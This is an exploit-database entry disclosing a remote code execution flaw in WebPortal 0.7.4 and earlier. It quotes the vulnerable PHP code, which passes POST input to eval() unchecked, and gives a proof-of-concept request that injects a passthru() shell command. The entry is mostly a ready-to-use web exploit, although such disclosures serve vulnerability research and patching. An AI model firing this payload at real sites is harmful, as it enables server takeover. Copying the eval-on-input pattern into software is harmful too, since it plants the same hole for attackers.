exploit-db-mirror/platforms/php/webapps/6544.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

15 lines
574 B
Text
Executable file

WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability
Download : http://webportal.ivanoculmine.com/download.php?mid=14
Vuln :
######################################################################
<?
if ($_GET["action"] == "execute") {
eval (stripslashes($_POST["code"]));
}
?>
######################################################################
POC :
/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);
######################################################################
# milw0rm.com [2008-09-23]